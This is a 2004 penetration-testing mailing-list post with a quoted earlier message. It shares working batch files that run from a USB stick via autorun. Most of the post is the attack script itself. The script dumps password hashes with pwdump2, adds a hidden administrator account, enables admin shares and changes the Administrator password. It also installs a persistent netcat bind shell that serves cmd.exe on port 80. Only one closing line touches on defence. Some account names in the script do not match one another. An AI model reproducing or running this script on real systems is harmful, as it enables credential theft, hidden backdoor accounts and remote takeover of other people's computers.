--- Begin Message ---
- To: pen-test@xxxxxxxxxxxxxxxxx
- Subject: Re: USB delivered attacks (working example)
- From: <mak_pen@xxxxxxxxxxx>
- Date: 3 Jun 2004 15:03:11 -0000
In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6@xxxxxxxxxxx>
I have been using this "attack" for some time now. below are the batch files
(test.bat, b.bat and autorun.inf. autorun.inf calls test.bat)i use:
*********<BOF test.bat>
@echo off
@start /min b.bat /B
<EOF test.bat>
*********<BOF b.bat>
@explorer .
@echo off
::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add
::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t
REG_DWORD /d 0 /f
::Enabling Admin Shares
@reg add
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v
@AutoSharewks /t reg_dword /d 1 /f
::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
<EOF b.bat>
I have tried this using a flash memmory and it works. what happens is that it
opens explorer showing the current directory so that it hides any shells that
might appear, then it does a series of commands which i have documented above.
to prevent against this i have a registry file i use to disable autorun all
together. contact me if you need it at: mak_pen(at)hotmail(dot)com
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>From: "Fred Gravel" <mindedsmasher@xxxxxxxxxxx>
>To: pen-test@xxxxxxxxxxxxxxxxx
>Subject: Re: USB delivered attacks
>Date: Wed, 02 Jun 2004 20:02:14 +0000
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>X-OriginalArrivalTime: 02 Jun 2004 20:02:14.0500 (UTC)
>And after some search ... autorun is possible on a usb storage device... as
>it explained just below ...
>Q: What must I do to trigger Autorun on my USB storage device?
>If you need to make a USB storage device that executes Autorun, the
>following two conditions must both be true:
>Media must be marked as removable.
>The device can be set to either static or removable.
>We associate the "removable" nature of a device with the bus that it resides
>on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI
>bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus
>would be regarded as removable by default. PnP uses a bit in the
>DEVICE_CAPABILITIES structure to determine this. For more information, see
>the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located
>The "removable" nature of media is a property of the device. For example, in
>the case of a CD-ROM or a ZIP drive, the medium can be removed without the
>device itself going away, but on the other hand the medium and the disk
>cannot be separated on static storage PC cards. We obtain this information
>by using the StorageDeviceProperty request. For more information, see the
>STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at
>Also the autorun could be used in "cooperation" of the desktop.ini file
>included in the folder(s) on the usb storage device if needed...
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